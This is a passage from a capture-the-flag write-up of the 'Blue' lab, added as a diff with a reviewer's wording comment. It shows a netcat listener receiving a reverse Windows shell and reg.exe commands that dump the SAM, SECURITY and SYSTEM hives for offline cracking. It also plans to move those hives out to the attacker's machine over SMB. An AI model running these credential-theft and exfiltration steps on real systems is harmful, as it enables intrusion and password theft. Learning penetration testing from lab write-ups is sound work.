content/post/blue-boot2-root-writeup.md

```diff
@@ -0,0 +1,699 @@
+good response status: INVALID_PARAMETER
+done
+```
+
+After executing the above, I switched back to our open netcat process to confirm the success of the attack and was happy to find a Windows shell prompt.
+
+```bash
+root@kali:~# nc -lvnp 443
+listening on [any] 443 ...
+connect to [10.10.47.175] from (UNKNOWN) [10.10.87.38] 49170
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Windows\system32>
+```
+
+### Foothold
+Unlike the first attack I knew this windows shell was extremely limited, and my first priority was to try to egress credentials so that I could escalate to a more stable point of access.
+
+```
+C:\Windows\system32>net user
+net user
+
+User accounts for \\
+
+-------------------------------------------------------------------------------
+Administrator            Guest                    Jon                      
+The command completed with one or more errors.
+
+
+C:\Windows\system32>cd ../../
+cd ../../
+
+C:\>reg.exe save hklm\sam C:\sam.save
+reg.exe save hklm\sam C:\sam.save
+The operation completed successfully.
+
+C:\>reg.exe save hklm\security C:\security.save
+reg.exe save hklm\security C:\security.save
+The operation completed successfully.
+
+C:\>reg.exe save hklm\system c:\system.save
+reg.exe save hklm\system C:\system.save
+The operation completed successfully.
+
+C:\>dir
+dir
+ Volume in drive C has no label.
+ Volume Serial Number is E611-0B66
+
+ Directory of C:\
+
+03/17/2019  01:27 PM                24 flag1.txt
+07/13/2009  09:20 PM    <DIR>          PerfLogs
+04/12/2011  02:28 AM    <DIR>          Program Files
+03/17/2019  04:28 PM    <DIR>          Program Files (x86)
+11/10/2020  10:18 PM            24,576 sam.save
+11/10/2020  10:18 PM            24,576 security.save
+11/10/2020  10:19 PM        12,353,536 system.save
+12/12/2018  09:13 PM    <DIR>          Users
+03/17/2019  04:36 PM    <DIR>          Windows
+               4 File(s)     12,402,712 bytes
+               5 Dir(s)  20,753,133,568 bytes free
+
+C:\>type flag1.txt
+type flag1.txt
+flag{access_the_machine}
+C:\>
+```
+
+The first step was identifying the local users and attempting to dump some crucial registers that I could attack offline. While doing this I happened to dump these registry hives to the root of the `C:\` drive which happened to point out the first flag `flag{access_the_machine}`. In hindsight this was probably a poor choice of location as it would be much more likely to be caught here than in other locations.
+
+Now that I had the hives dumped on disk I still needed to figure out how to egress them to my local machine for further attack. This lead me to reference an example from [ropnop's blog](https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb) pointing me towards the impacket-smbserver that comes preinstalled on Kali as I could interact with SMB from the cmd shell with out the need to install any further tools or have an interactive shell.
```

Comment:
~that~ which comes preinstalled on Kali. I could interact with SMD from the cmd shell without the need for an interactive shell or any other tools